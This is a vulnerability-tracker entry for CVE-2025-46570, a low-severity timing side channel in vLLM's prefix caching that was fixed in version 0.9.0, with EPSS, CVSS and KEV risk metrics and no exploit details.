CVE-2025-46570

low-risk
Published 2025-05-29

vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). These timing differences caused by matching chunks are significant enough to be recognized and exploited. This issue has been patched in version 0.9.0.

Do I need to act?

-
0.18% chance of exploitation
EPSS score — low exploit probability
-
Not on CISA KEV list
No confirmed active exploitation reported to CISA
?
Patch status unknown
Check vendor advisories for fix availability and mitigation guidance
2
CVSS 2.6/10 Low
NETWORK / HIGH complexity

Affected Products (1)

Affected Vendors

16
/ 100
low-risk
Severity 10/34 · Low
Exploitability 1/34 · Minimal
Exposure 5/34 · Minimal